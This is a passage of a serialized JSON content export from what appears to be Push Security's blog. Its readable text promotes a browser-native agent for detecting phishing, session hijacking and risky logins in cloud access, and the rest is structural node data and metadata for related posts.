actually saw and did. Click-by-click browser session data is what allows responders to understand intent, scope impact accurately, and determine whether a session was abused or simply used.",[],{},{"nodeType":235,"data":29101,"content":29102},{},[29103],{"nodeType":173,"value":29104,"marks":29105,"data":29107},"Visibility into the browser session holds the answers",[29106],{"type":370},{},{"nodeType":178,"data":29109,"content":29110},{},[29111],{"nodeType":173,"value":29112,"marks":29113,"data":29114},"If the browser session is where cloud access actually happens, then treating it as a black box is no longer viable.",[],{},{"nodeType":178,"data":29116,"content":29117},{},[29118],{"nodeType":173,"value":29119,"marks":29120,"data":29121},"This is where Push Security fits. Push is designed to cover the missing middle, not by replacing your existing cloud security stack, but by extending it into the one place it can’t reach on its own: the live browser session.",[],{},{"nodeType":178,"data":29123,"content":29124},{},[29125],{"nodeType":173,"value":29126,"marks":29127,"data":29128},"CSPM and CNAPP remain the right tools for securing cloud configuration and infrastructure. They tell you whether IAM policies are sane, resources are exposed, and guardrails are in place. Push addresses a different problem. It focuses on what happens once access is granted, when identity moves from configuration into motion.",[],{},{"nodeType":178,"data":29130,"content":29131},{},[29132],{"nodeType":173,"value":29133,"marks":29134,"data":29135},"Push does this by deploying a browser-native agent, like EDR operates at the host level. That agent gives defenders direct visibility into the application session itself like the page structure being rendered, the user’s interaction with it, and the behaviors attackers rely on when they hijack sessions in real time.",[],{},{"nodeType":312,"data":29137,"content":29140},{"target":29138},{"sys":29139},{"id":25922,"type":317,"linkType":318},[],{"nodeType":178,"data":29142,"content":29143},{},[29144],{"nodeType":173,"value":29145,"marks":29146,"data":29147},"That visibility changes how cloud access can be defended.",[],{},{"nodeType":250,"data":29149,"content":29150},{},[29151,29166,29181,29196],{"nodeType":254,"data":29152,"content":29153},{},[29154],{"nodeType":178,"data":29155,"content":29156},{},[29157,29162],{"nodeType":173,"value":29158,"marks":29159,"data":29161},"Real-time detection in the browser:",[29160],{"type":370},{},{"nodeType":173,"value":29163,"marks":29164,"data":29165}," Detect in-browser attacker techniques as they happen, left of boom. Phishing kits rendering inside login flows, session tokens being intercepted, credential submission into lookalike pages — Push observes these behaviors directly and can block them before any cloud API is touched or a console is reached.",[],{},{"nodeType":254,"data":29167,"content":29168},{},[29169],{"nodeType":178,"data":29170,"content":29171},{},[29172,29177],{"nodeType":173,"value":29173,"marks":29174,"data":29176},"Complete visibility into cloud access paths:",[29175],{"type":370},{},{"nodeType":173,"value":29178,"marks":29179,"data":29180}," Build an accurate inventory of how users are actually accessing cloud services. Push surfaces every application in use, including shadow SaaS, and shows which accounts are local, duplicated, missing MFA, or bypassing SSO — crucial visibility that falls between the cracks of application and identity provider. ",[],{},{"nodeType":254,"data":29182,"content":29183},{},[29184],{"nodeType":178,"data":29185,"content":29186},{},[29187,29192],{"nodeType":173,"value":29188,"marks":29189,"data":29191},"Active hardening at the point of access:",[29190],{"type":370},{},{"nodeType":173,"value":29193,"marks":29194,"data":29195}," Enforce secure login behavior across the entire application surface, not just centrally managed apps. Push can steer users toward using MFA and SSO and block risky credentials on unmanaged tools, closing identity gaps before they’re exploited.",[],{},{"nodeType":254,"data":29197,"content":29198},{},[29199],{"nodeType":178,"data":29200,"content":29201},{},[29202,29207],{"nodeType":173,"value":29203,"marks":29204,"data":29206},"Session-level context for rapid response:",[29205],{"type":370},{},{"nodeType":173,"value":29208,"marks":29209,"data":29210}," When something does go wrong, Push provides the missing ground truth. Instead of stitching together partial logs or relying on brittle app-level integrations, responders can see exactly what the user saw and did in the browser (from context generated directly from the browser session itself) making it possible to understand intent, assess scope accurately, and contain a compromised session quickly.",[],{},{"nodeType":231,"data":29212,"content":29213},{},[],{"nodeType":3769,"data":29215,"content":29216},{},[29217],{"nodeType":178,"data":29218,"content":29219},{},[29220,29223,29230,29233,29240,29243,29250],{"nodeType":173,"value":3925,"marks":29221,"data":29222},[],{},{"nodeType":186,"data":29224,"content":29225},{"uri":1456},[29226],{"nodeType":173,"value":3932,"marks":29227,"data":29229},[29228],{"type":194},{},{"nodeType":173,"value":2936,"marks":29231,"data":29232},[],{},{"nodeType":186,"data":29234,"content":29235},{"uri":3941},[29236],{"nodeType":173,"value":3944,"marks":29237,"data":29239},[29238],{"type":194},{},{"nodeType":173,"value":3949,"marks":29241,"data":29242},[],{},{"nodeType":186,"data":29244,"content":29245},{"uri":1469},[29246],{"nodeType":173,"value":1472,"marks":29247,"data":29249},[29248],{"type":194},{},{"nodeType":173,"value":1477,"marks":29251,"data":29252},[],{},{"nodeType":178,"data":29254,"content":29255},{},[29256],{"nodeType":173,"value":37,"marks":29257,"data":29258},[],{},{"entries":29260},{"hyperlink":29261,"inline":29262,"block":29263},[],[],[29264],{"sys":29265,"__typename":5345,"title":29266,"caption":29266,"layoutMode":118,"file":29267},{"id":25922},"The browser sees the \"missing middle\" that is key to stopping modern attacks.",{"url":29268,"width":29269,"height":29270},"https://images.ctfassets.net/y1cdw1ablpvd/62kkmEzar8I24kELigqdoq/8e4c0476ba9bec03c418977bed5f40e6/Screenshot_2026-01-30_at_16.42.19.png",3372,1560,"content:blog:push-plus-cloud-security.json","blog/push-plus-cloud-security.json","blog/push-plus-cloud-security",{"_path":29275,"_dir":1500,"_draft":6,"_partial":6,"_locale":37,"sys":29276,"ogImage":118,"summary":29278,"title":6647,"subtitle":118,"metaTitle":29289,"synopsis":25583,"hashTags":118,"publishedDate":25584,"slug":6648,"tagsCollection":29290,"relatedBlogPostsCollection":29296,"authorsCollection":30085,"content":30089,"_id":30440,"_type":5439,"_source":5440,"_file":30441,"_stem":30442,"_extension":5439},"/blog/push-plus-endpoint-security",{"id":2044,"publishedAt":29277},"2026-02-06T16:46:10.661Z",{"json":29279},{"data":29280,"content":29281,"nodeType":165},{},[29282],{"data":29283,"content":29284,"nodeType":178},{},[29285],{"data":29286,"marks":29287,"value":29288,"nodeType":173},{},[],"One of the key questions we often hear is \"we've already got EDR, so why do we need to be in the browser too?\". Well, here's the answer!","Push + Endpoint Security: Extending D&R to the browser",{"items":29291},[29292,29294],{"sys":29293,"name":505},{"id":504},{"sys":29295,"name":509},{"id":508},{"items":29297},[29298,29745],{"__typename":1528,"sys":29299,"content":29300,"title":6643,"synopsis":26089,"hashTags":118,"publishedDate":25584,"slug":6644,"tagsCollection":29735,"authorsCollection":29741},{"id":2023},{"json":29301},{"data":29302,"content":29303,"nodeType":165},{},[29304,29311,29317,29323,29333,29340,29346,29352,29358,29365,29368,29375,29381,29387,29393,29408,29413,29419,29434,29441,29549,29552,29559,29565,29575,29581,29586,29592,29598,29605,29611,29618,29624,29630,29636,29678,29688,29724,29729],{"data":29305,"content":29306,"nodeType":169},{},[29307],{"data":29308,"marks":29309,"value":25611,"nodeType":173},{},[29310],{"type":370},{"data":29312,"content":29313,"nodeType":178},{},[29314],{"data":29315,"marks":29316,"value":25618,"nodeType":173},{},[],{"data":29318,"content":29319,"nodeType":178},{},[29320],{"data":29321,"marks":29322,"value":25625,"nodeType":173},{},[],{"data":29324,"content":29325,"nodeType":178},{},[29326,29329],{"data":29327,"marks":29328,"value":25632,"nodeType":173},{},[],{"data":29330,"marks":29331,"value":25637,"nodeType":173},{},[29332],{"type":370},{"data":29334,"content":29335,"nodeType":235},{},[29336],{"data":29337,"marks":29338,"value":25645,"nodeType":173},{},[29339],{"type":370},{"data":29341,"content":29342,"nodeType":178},{},[29343],{"data":29344,"marks":29345,"value":25652,"nodeType":173},{},[],{"data":29347,"content":29348,"nodeType":178},{},[29349],{"data":29350,"marks":29351,"value":25659,"nodeType":173},{},[],{"data":29353,"content":29354,"nodeType":178},{},[29355],{"data":29356,"marks":29357,"value":25666,"nodeType":173},{},[],{"data":29359,"content":29360,"nodeType":178},{},[29361],{"data":29362,"marks":29363,"value":25674,"nodeType":173},{},[29364],{"type":370},{"data":29366,"content":29367,"nodeType":231},{},[],{"data":29369,"content":29370,"nodeType":169},{},[29371],{"data":29372,"marks":29373,"value":25685,"nodeType":173},{},[29374],{"type":370},{"data":29376,"content":29377,"nodeType":178},{},[29378],{"data":29379,"marks":29380,"value":25692,"nodeType":173},{},[],{"data":29382,"content":29383,"nodeType":178},{},[29384],{"data":29385,"marks":29386,"value":25699,"nodeType":173},{},[],{"data":29388,"content":29389,"nodeType":178},{},[29390],{"data":29391,"marks":29392,"value":25706,"nodeType":173},{},[],{"data":29394,"content":29395,"nodeType":178},{},[29396,29399,29405],{"data":29397,"marks":29398,"value":25713,"nodeType":173},{},[],{"data":29400,"content":29401,"nodeType":186},{"uri":8987},[29402],{"data":29403,"marks":29404,"value":8157,"nodeType":173},{},[],{"data":29406,"marks":29407,"value":25723,"nodeType":173},{},[],{"data":29409,"content":29412,"nodeType":312},{"target":29410},{"sys":29411},{"id":25728,"type":317,"linkType":318},[],{"data":29414,"content":29415,"nodeType":178},{},[29416],{"data":29417,"marks":29418,"value":25736,"nodeType":173},{},[],{"data":29420,"content":29421,"nodeType":178},{},[29422,29425,29431],{"data":29423,"marks":29424,"value":25743,"nodeType":173},{},[],{"data":29426,"content":29427,"nodeType":186},{"uri":5002},[29428],{"data":29429,"marks":29430,"value":25750,"nodeType":173},{},[],{"data":29432,"marks":29433,"value":25754,"nodeType":173},{},[],{"data":29435,"content":29436,"nodeType":178},{},[29437],{"data":29438,"marks":29439,"value":25762,"nodeType":173},{},[29440],{"type":1646},{"data":29442,"content":29443,"nodeType":1653},{},[29444,29465,29486,29507,29528],{"data":29445,"content":29446,"nodeType":1657},{},[29447,29456],{"data":29448,"content":29449,"nodeType":1661},{},[29450],{"data":29451,"content":29452,"nodeType":178},{},[29453],{"data":29454,"marks":29455,"value":25778,"nodeType":173},{},[],{"data":29457,"content":29458,"nodeType":1661},{},[29459],{"data":29460,"content":29461,"nodeType":178},{},[29462],{"data":29463,"marks":29464,"value":25788,"nodeType":173},{},[],{"data":29466,"content":29467,"nodeType":1657},{},[29468,29477],{"data":29469,"content":29470,"nodeType":1687},{},[29471],{"data":29472,"content":29473,"nodeType":178},{},[29474],{"data":29475,"marks":29476,"value":25801,"nodeType":173},{},[],{"data":29478,"content":29479,"nodeType":1687},{},[29480],{"data":29481,"content":29482,"nodeType":178},{},[29483],{"data":29484,"marks":29485,"value":25811,"nodeType":173},{},[],{"data":29487,"content":29488,"nodeType":1657},{},[29489,29498],{"data":29490,"content":29491,"nodeType":1687},{},[29492],{"data":29493,"content":29494,"nodeType":178},{},[29495],{"data":29496,"marks":29497,"value":25824,"nodeType":173},{},[],{"data":29499,"content":29500,"nodeType":1687},{},[29501],{"data":29502,"content":29503,"nodeType":178},{},[29504],{"data":29505,"marks":29506,"value":25834,"nodeType":173},{},[],{"data":29508,"content":29509,"nodeType":1657},{},[29510,29519],{"data":29511,"content":29512,"nodeType":1687},{},[29513],{"data":29514,"content":29515,"nodeType":178},{},[29516],{"data":29517,"marks":29518,"value":25847,"nodeType":173},{},[],{"data":29520,"content":29521,"nodeType":1687},{},[29522],{"data":29523,"content":29524,"nodeType":178},{},[29525],{"data":29526,"marks":29527,"value":25857,"nodeType":173},{},[],{"data":29529,"content":29530,"nodeType":1657},{},[29531,29540],{"data":29532,"content":29533,"nodeType":1687},{},[29534],{"data":29535,"content":29536,"nodeType":178},{},[29537],{"data":29538,"marks":29539,"value":25870,"nodeType":173},{},[],{"data":29541,"content":29542,"nodeType":1687},{},[29543],{"data":29544,"content":29545,"nodeType":178},{},[29546],{"data":29547,"marks":29548,"value":25880,"nodeType":173},{},[],{"data":29550,"content":29551,"nodeType":231},{},[],{"data":29553,"content":29554,"nodeType":169},{},[29555],{"data":29556,"marks":29557,"value":25891,"nodeType":173},{},[29558],{"type":370},{"data":29560,"content":29561,"nodeType":178},{},[29562],{"data":29563,"marks":29564,"value":25898,"nodeType":173},{},[],{"data":29566,"content":29567,"nodeType":178},{},[29568,29571],{"data":29569,"marks":29570,"value":25905,"nodeType":173},{},[],{"data":29572,"marks":29573,"value":25910,"nodeType":173},{},[29574],{"type":370},{"data":29576,"content":29577,"nodeType":178},{},[29578],{"data":29579,"marks":29580,"value":25917,"nodeType":173},{},[],{"data":29582,"content":29585,"nodeType":312},{"target":29583},{"sys":29584},{"id":25922,"type":317,"linkType":318},[],{"data":29587,"content":29588,"nodeType":178},{},[29589],{"data":29590,"marks":29591,"value":25930,"nodeType":173},{},[],{"data":29593,"content":29594,"nodeType":178},{},[29595],{"data":29596,"marks":29597,"value":25937,"nodeType":173},{},[],{"data":29599,"content":29600,"nodeType":235},{},[29601],{"data":29602,"marks":29603,"value":25945,"nodeType":173},{},[29604],{"type":370},{"data":29606,"content":29607,"nodeType":178},{},[29608],{"data":29609,"marks":29610,"value":25952,"nodeType":173},{},[],{"data":29612,"content":29613,"nodeType":178},{},[29614],{"data":29615,"marks":29616,"value":25960,"nodeType":173},{},[29617],{"type":370},{"data":29619,"content":29620,"nodeType":178},{},[29621],{"data":29622,"marks":29623,"value":25967,"nodeType":173},{},[],{"data":29625,"content":29626,"nodeType":178},{},[29627],{"data":29628,"marks":29629,"value":25974,"nodeType":173},{},[],{"data":29631,"content":29632,"nodeType":178},{},[29633],{"data":29634,"marks":29635,"value":25981,"nodeType":173},{},[],{"data":29637,"content":29638,"nodeType":250},{},[29639,29652,29665],{"data":29640,"content":29641,"nodeType":254},{},[29642],{"data":29643,"content":29644,"nodeType":178},{},[29645,29649],{"data":29646,"marks":29647,"value":25995,"nodeType":173},{},[29648],{"type":370},{"data":29650,"marks":29651,"value":25999,"nodeType":173},{},[],{"data":29653,"content":29654,"nodeType":254},{},[29655],{"data":29656,"content":29657,"nodeType":178},{},[29658,29662],{"data":29659,"marks":29660,"value":26010,"nodeType":173},{},[29661],{"type":370},{"data":29663,"marks":29664,"value":26014,"nodeType":173},{},[],{"data":29666,"content":29667,"nodeType":254},{},[29668],{"data":29669,"content":29670,"nodeType":178},{},[29671,29675],{"data":29672,"marks":29673,"value":26025,"nodeType":173},{},[29674],{"type":370},{"data":29676,"marks":29677,"value":26029,"nodeType":173},{},[],{"data":29679,"content":29680,"nodeType":178},{},[29681,29684],{"data":29682,"marks":29683,"value":26036,"nodeType":173},{},[],{"data":29685,"marks":29686,"value":26041,"nodeType":173},{},[29687],{"type":370},{"data":29689,"content":29690,"nodeType":3769},{},[29691],{"data":29692,"content":29693,"nodeType":178},{},[29694,29697,29703,29706,29712,29715,29721],{"data":29695,"marks":29696,"value":3925,"nodeType":173},{},[],{"data":29698,"content":29699,"nodeType":186},{"uri":1456},[29700],{"data":29701,"marks":29702,"value":3932,"nodeType":173},{},[],{"data":29704,"marks":29705,"value":2936,"nodeType":173},{},[],{"data":29707,"content":29708,"nodeType":186},{"uri":3941},[29709],{"data":29710,"marks":29711,"value":3944,"nodeType":173},{},[],{"data":29713,"marks":29714,"value":3949,"nodeType":173},{},[],{"data":29716,"content":29717,"nodeType":186},{"uri":1469},[29718],{"data":29719,"marks":29720,"value":1472,"nodeType":173},{},[],{"data":29722,"marks":29723,"value":1477,"nodeType":173},{},[],{"data":29725,"content":29728,"nodeType":312},{"target":29726},{"sys":29727},{"id":25575,"type":317,"linkType":318},[],{"data":29730,"content":29731,"nodeType":178},{},[29732],{"data":29733,"marks":29734,"value":37,"nodeType":173},{},[],{"items":29736},[29737,29739],{"sys":29738,"name":505},{"id":504},{"sys":29740,"name":509},{"id":508},{"items":29742},[29743],{"fullName":25594,"firstName":25595,"jobTitle":514,"profilePicture":29744},{"url":25597},{"__typename":1528,"sys":29746,"content":29747,"title":6651,"synopsis":28081,"hashTags":118,"publishedDate":28082,"slug":6652,"tagsCollection":30075,"authorsCollection":30081},{"id":2058},{"json":29748},{"nodeType":165,"data":29749,"content":29750},{},[29751,29758,29764,29770,29776,29782,29788,29795,29801,29807,29813,29816,29823,29829,29835,29841,29847,29863,29870,29876,29882,29888,29891,29898,29911,29924,29930,29937,29943,29949,29955,29961,29966,29972,30027,30030,30069],{"nodeType":169,"data":29752,"content":29753},{},[29754],{"nodeType":173,"value":28896,"marks":29755,"data":29757},[29756],{"type":370},{},{"nodeType":178,"data":29759,"content":29760},{},[29761],{"nodeType":173,"value":28904,"marks":29762,"data":29763},[],{},{"nodeType":178,"data":29765,"content":29766},{},[29767],{"nodeType":173,"value":28911,"marks":29768,"data":29769},[],{},{"nodeType":178,"data":29771,"content":29772},{},[29773],{"nodeType":173,"value":28918,"marks":29774,"data":29775},[],{},{"nodeType":178,"data":29777,"content":29778},{},[29779],{"nodeType":173,"value":28925,"marks":29780,"data":29781},[],{},{"nodeType":178,"data":29783,"content":29784},{},[29785],{"nodeType":173,"value":28932,"marks":29786,"data":29787},[],{},{"nodeType":235,"data":29789,"content":29790},{},[29791],{"nodeType":173,"value":28939,"marks":29792,"data":29794},[29793],{"type":370},{},{"nodeType":178,"data":29796,"content":29797},{},[29798],{"nodeType":173,"value":28947,"marks":29799,"data":29800},[],{},{"nodeType":178,"data":29802,"content":29803},{},[29804],{"nodeType":173,"value":28954,"marks":29805,"data":29806},[],{},{"nodeType":178,"data":29808,"content":29809},{},[29810],{"nodeType":173,"value":28961,"marks":29811,"data":29812},[],{},{"nodeType":231,"data":29814,"content":29815},{},[],{"nodeType":169,"data":29817,"content":29818},{},[29819],{"nodeType":173,"value":28971,"marks":29820,"data":29822},[29821],{"type":370},{},{"nodeType":178,"data":29824,"content":29825},{},[29826],{"nodeType":173,"value":28979,"marks":29827,"data":29828},[],{},{"nodeType":178,"data":29830,"content":29831},{},[29832],{"nodeType":173,"value":28986,"marks":29833,"data":29834},[],{},{"nodeType":178,"data":29836,"content":29837},{},[29838],{"nodeType":173,"value":28993,"marks":29839,"data":29840},[],{},{"nodeType":178,"data":29842,"content":29843},{},[29844],{"nodeType":173,"value":29000,"marks":29845,"data":29846},[],{},{"nodeType":178,"data":29848,"content":29849},{},[29850,29853,29860],{"nodeType":173,"value":25743,"marks":29851,"data":29852},[],{},{"nodeType":186,"data":29854,"content":29855},{"uri":5002},[29856],{"nodeType":173,"value":29013,"marks":29857,"data":29859},[29858],{"type":194},{},{"nodeType":173,"value":29018,"marks":29861,"data":29862},[],{},{"nodeType":235,"data":29864,"content":29865},{},[29866],{"nodeType":173,"value":29025,"marks":29867,"data":29869},[29868],{"type":370},{},{"nodeType":178,"data":29871,"content":29872},{},[29873],{"nodeType":173,"value":29033,"marks":29874,"data":29875},[],{},{"nodeType":178,"data":29877,"content":29878},{},[29879],{"nodeType":173,"value":29040,"marks":29880,"data":29881},[],{},{"nodeType":178,"data":29883,"content":29884},{},[29885],{"nodeType":173,"value":29047,"marks":29886,"data":29887},[],{},{"nodeType":231,"data":29889,"content":29890},{},[],{"nodeType":169,"data":29892,"content":29893},{},[29894],{"nodeType":173,"value":29057,"marks":29895,"data":29897},[29896],{"type":370},{},{"nodeType":178,"data":29899,"content":29900},{},[29901,29904,29908],{"nodeType":173,"value":29065,"marks":29902,"data":29903},[],{},{"nodeType":173,"value":29069,"marks":29905,"data":29907},[29906],{"type":370},{},{"nodeType":173,"value":29074,"marks":29909,"data":29910},[],{},{"nodeType":178,"data":29912,"content":29913},{},[29914,29917,29921],{"nodeType":173,"value":29081,"marks":29915,"data":29916},[],{},{"nodeType":173,"value":29085,"marks":29918,"data":29920},[29919],{"type":370},{},{"nodeType":173,"value":29090,"marks":29922,"data":29923},[],{},{"nodeType":178,"data":29925,"content":29926},{},[29927],{"nodeType":173,"value":29097,"marks":29928,"data":29929},[],{},{"nodeType":235,"data":29931,"content":29932},{},[29933],{"nodeType":173,"value":29104,"marks":29934,"data":29936},[29935],{"type":370},{},{"nodeType":178,"data":29938,"content":29939},{},[29940],{"nodeType":173,"value":29112,"marks":29941,"data":29942},[],{},{"nodeType":178,"data":29944,"content":29945},{},[29946],{"nodeType":173,"value":29119,"marks":29947,"data":29948},[],{},{"nodeType":178,"data":29950,"content":29951},{},[29952],{"nodeType":173,"value":29126,"marks":29953,"data":29954},[],{},{"nodeType":178,"data":29956,"content":29957},{},[29958],{"nodeType":173,"value":29133,"marks":29959,"data":29960},[],{},{"nodeType":312,"data":29962,"content":29965},{"target":29963},{"sys":29964},{"id":25922,"type":317,"linkType":318},[],{"nodeType":178,"data":29967,"content":29968},{},[29969],{"nodeType":173,"value":29145,"marks":29970,"data":29971},[],{},{"nodeType":250,"data":29973,"content":29974},{},[29975,29988,30001,30014],{"nodeType":254,"data":29976,"content":29977},{},[29978],{"nodeType":178,"data":29979,"content":29980},{},[29981,29985],{"nodeType":173,"value":29158,"marks":29982,"data":29984},[29983],{"type":370},{},{"nodeType":173,"value":29163,"marks":29986,"data":29987},[],{},{"nodeType":254,"data":29989,"content":29990},{},[29991],{"nodeType":178,"data":29992,"content":29993},{},[29994,29998],{"nodeType":173,"value":29173,"marks":29995,"data":29997},[29996],{"type":370},{},{"nodeType":173,"value":29178,"marks":29999,"data":30000},[],{},{"nodeType":254,"data":30002,"content":30003},{},[30004],{"nodeType":178,"data":30005,"content":30006},{},[30007,30011],{"nodeType":173,"value":29188,"marks":30008,"data":30010},[30009],{"type":370},{},{"nodeType":173,"value":29193,"marks":30012,"data":30013},[],{},{"nodeType":254,"data":30015,"content":30016},{},[30017],{"nodeType":178,"data":30018,"content":30019},{},[30020,30024],{"nodeType":173,"value":29203,"marks":30021,"data":30023},[30022],{"type":370},{},{"nodeType":173,"value":29208,"marks":30025,"data":30026},[],{},{"nodeType":231,"data":30028,"content":30029},{},[],{"nodeType":3769,"data":30031,"content":30032},{},[30033],{"nodeType":178,"data":30034,"content":30035},{},[30036,30039,30046,30049,30056,30059,30066],{"nodeType":173,"value":3925,"marks":30037,"data":30038},[],{},{"nodeType":186,"data":30040,"content":30041},{"uri":1456},[30042],{"nodeType":173,"value":3932,"marks":30043,"data":30045},[30044],{"type":194},{},{"nodeType":173,"value":2936,"marks":30047,"data":30048},[],{},{"nodeType":186,"data":30050,"content":30051},{"uri":3941},[30052],{"nodeType":173,"value":3944,"marks":30053,"data":30055},[30054],{"type":194},{},{"nodeType":173,"value":3949,"marks":30057,"data":30058},[],{},{"nodeType":186,"data":30060,"content":30061},{"uri":1469},[30062],{"nodeType":173,"value":1472,"marks":30063,"data":30065},[30064],{"type":194},{},{"nodeType":173,"value":1477,"marks":30067,"data":30068},[],{},{"nodeType":178,"data":30070,"content":30071},{},[30072],{"nodeType":173,"value":37,"marks":30073,"data":30074},[],{},{"items":30076},[30077,30079],{"sys":30078,"name":505},{"id":504},{"sys":30080,"name":509},{"id":508},{"items":30082},[30083],{"fullName":25594,"firstName":25595,"jobTitle":514,"profilePicture":30084},{"url":25597},{"items":30086},[30087],{"fullName":25594,"firstName":25595,"jobTitle":514,"profilePicture":30088},{"url":25597},{"json":30090,"links":30423},{"data":30091,"content":30092,"nodeType":165},{},[30093,30100,30106,30112,30122,30132,30139,30145,30151,30157,30162,30165,30172,30178,30184,30194,30200,30206,30213,30219,30261,30274,30280,30287,30293,30315,30321,30328,30370,30376,30412,30417],{"data":30094,"content":30095,"nodeType":169},{},[30096],{"data":30097,"marks":30098,"value":25212,"nodeType":173},{},[30099],{"type":370},{"data":30101,"content":30102,"nodeType":178},{},[30103],{"data":30104,"marks":30105,"value":25219,"nodeType":173},{},[],{"data":30107,"content":30108,"nodeType":178},{},[30109],{"data":30110,"marks":30111,"value":25226,"nodeType":173},{},[],{"data":30113,"content":30114,"nodeType":178},{},[30115,30118],{"data":30116,"marks":30117,"value":25233,"nodeType":173},{},[],{"data":30119,"marks":30120,"value":25238,"nodeType":173},{},[30121],{"type":370},{"data":30123,"content":30124,"nodeType":178},{},[30125,30128],{"data":30126,"marks":30127,"value":25245,"nodeType":173},{},[],{"data":30129,"marks":30130,"value":25250,"nodeType":173},{},[30131],{"type":1646},{"data":30133,"content":30134,"nodeType":235},{},[30135],{"data":30136,"marks":30137,"value":25258,"nodeType":173},{},[30138],{"type":370},{"data":30140,"content":30141,"nodeType":178},{},[30142],{"data":30143,"marks":30144,"value":25265,"nodeType":173},{},[],{"data":30146,"content":30147,"nodeType":178},{},[30148],{"data":30149,"marks":30150,"value":25272,"nodeType":173},{},[],{"data":30152,"content":30153,"nodeType":178},{},[30154],{"data":30155,"marks":30156,"value":25279,"nodeType":173},{},[],{"data":30158,"content":30161,"nodeType":312},{"target":30159},{"sys":30160},{"id":25284,"type":317,"linkType":318},[],{"data":30163,"content":30164,"nodeType":231},{},[],{"data":30166,"content":30167,"nodeType":169},{},[30168],{"data":30169,"marks":30170,"value":25296,"nodeType":173},{},[30171],{"type":370},{"data":30173,"content":30174,"nodeType":178},{},[30175],{"data":30176,"marks":30177,"value":25303,"nodeType":173},{},[],{"data":30179,"content":30180,"nodeType":178},{},[30181],{"data":30182,"marks":30183,"value":25310,"nodeType":173},{},[],{"data":30185,"content":30186,"nodeType":178},{},[30187,30191],{"data":30188,"marks":30189,"value":25318,"nodeType":173},{},[30190],{"type":370},{"data":30192,"marks":30193,"value":25322,"nodeType":173},{},[],{"data":30195,"content":30196,"nodeType":178},{},[30197],{"data":30198,"marks":30199,"value":25329,"nodeType":173},{},[],{"data":30201,"content":30202,"nodeType":178},{},[30203],{"data":30204,"marks":30205,"value":25336,"nodeType":173},{},[],{"data":30207,"content":30208,"nodeType":235},{},[30209],{"data":30210,"marks":30211,"value":25344,"nodeType":173},{},[30212],{"type":370},{"data":30214,"content":30215,"nodeType":178},{},[30216],{"data":30217,"marks":30218,"value":25351,"nodeType":173},{},[],{"data":30220,"content":30221,"nodeType":250},{},[30222,30235,30248],{"data":30223,"content":30224,"nodeType":254},{},[30225],{"data":30226,"content":30227,"nodeType":178},{},[30228,30232],{"data":30229,"marks":30230,"value":25365,"nodeType":173},{},[30231],{"type":370},{"data":30233,"marks":30234,"value":25369,"nodeType":173},{},[],{"data":30236,"content":30237,"nodeType":254},{},[30238],{"data":30239,"content":30240,"nodeType":178},{},[30241,30245],{"data":30242,"marks":30243,"value":25380,"nodeType":173},{},[30244],{"type":370},{"data":30246,"marks":30247,"value":25384,"nodeType":173},{},[],{"data":30249,"content":30250,"nodeType":254},{},[30251],{"data":30252,"content":30253,"nodeType":178},{},[30254,30258],{"data":30255,"marks":30256,"value":25395,"nodeType":173},{},[30257],{"type":370},{"data":30259,"marks":30260,"value":25399,"nodeType":173},{},[],{"data":30262,"content":30263,"nodeType":178},{},[30264,30267,30271],{"data":30265,"marks":30266,"value":25406,"nodeType":173},{},[],{"data":30268,"marks":30269,"value":25411,"nodeType":173},{},[30270],{"type":370},{"data":30272,"marks":30273,"value":25415,"nodeType":173},{},[],{"data":30275,"content":30276,"nodeType":178},{},[30277],{"data":30278,"marks":30279,"value":25422,"nodeType":173},{},[],{"data":30281,"content":30282,"nodeType":235},{},[30283],{"data":30284,"marks":30285,"value":25430,"nodeType":173},{},[30286],{"type":370},{"data":30288,"content":30289,"nodeType":178},{},[30290],{"data":30291,"marks":30292,"value":25437,"nodeType":173},{},[],{"data":30294,"content":30295,"nodeType":178},{},[30296,30299,30303,30306,30312],{"data":30297,"marks":30298,"value":25444,"nodeType":173},{},[],{"data":30300,"marks":30301,"value":25449,"nodeType":173},{},[30302],{"type":370},{"data":30304,"marks":30305,"value":25453,"nodeType":173},{},[],{"data":30307,"content":30308,"nodeType":186},{"uri":25456},[30309],{"data":30310,"marks":30311,"value":25461,"nodeType":173},{},[],{"data":30313,"marks":30314,"value":37,"nodeType":173},{},[],{"data":30316,"content":30317,"nodeType":178},{},[30318],{"data":30319,"marks":30320,"value":25471,"nodeType":173},{},[],{"data":30322,"content":30323,"nodeType":235},{},[30324],{"data":30325,"marks":30326,"value":25479,"nodeType":173},{},[30327],{"type":370},{"data":30329,"content":30330,"nodeType":250},{},[30331,30344,30357],{"data":30332,"content":30333,"nodeType":254},{},[30334],{"data":30335,"content":30336,"nodeType":178},{},[30337,30341],{"data":30338,"marks":30339,"value":25493,"nodeType":173},{},[30340],{"type":370},{"data":30342,"marks":30343,"value":25497,"nodeType":173},{},[],{"data":30345,"content":30346,"nodeType":254},{},[30347],{"data":30348,"content":30349,"nodeType":178},{},[30350,30354],{"data":30351,"marks":30352,"value":25508,"nodeType":173},{},[30353],{"type":370},{"data":30355,"marks":30356,"value":25512,"nodeType":173},{},[],{"data":30358,"content":30359,"nodeType":254},{},[30360],{"data":30361,"content":30362,"nodeType":178},{},[30363,30367],{"data":30364,"marks":30365,"value":25523,"nodeType":173},{},[30366],{"type":370},{"data":30368,"marks":30369,"value":25527,"nodeType":173},{},[],{"data":30371,"content":30372,"nodeType":178},{},[30373],{"data":30374,"marks":30375,"value":25534,"nodeType":173},{},[],{"data":30377,"content":30378,"nodeType":3769},{},[30379],{"data":30380,"content":30381,"nodeType":178},{},[30382,30385,30391,30394,30400,30403,30409],{"data":30383,"marks":30384,"value":3925,"nodeType":173},{},[],{"data":30386,"content":30387,"nodeType":186},{"uri":1456},[30388],{"data":30389,"marks":30390,"value":3932,"nodeType":173},{},[],{"data":30392,"marks":30393,"value":2936,"nodeType":173},{},[],{"data":30395,"content":30396,"nodeType":186},{"uri":3941},[30397],{"data":30398,"marks":30399,"value":3944,"nodeType":173},{},[],{"data":30401,"marks":30402,"value":3949,"nodeType":173},{},[],{"data":30404,"content":30405,"nodeType":186},{"uri":1469},[30406],{"data":30407,"marks":30408,"value":1472,"nodeType":173},{},[],{"data":30410,"marks":30411,"value":1477,"nodeType":173},{},[],{"data":30413,"content":30416,"nodeType":312},{"target":30414},{"sys":30415},{"id":25575,"type":317,"linkType":318},[],{"data":30418,"content":30419,"nodeType":178},{},[30420],{"data":30421,"marks":30422,"value":37,"nodeType":173},{},[],{"entries":30424},{"hyperlink":30425,"inline":30426,"block":30427},[],[],[30428,30436],{"sys":30429,"__typename":5345,"title":30430,"caption":30431,"layoutMode":118,"file":30432},{"id":25284},"Security Eras","Modern attacks play out in the browser, exploiting a security 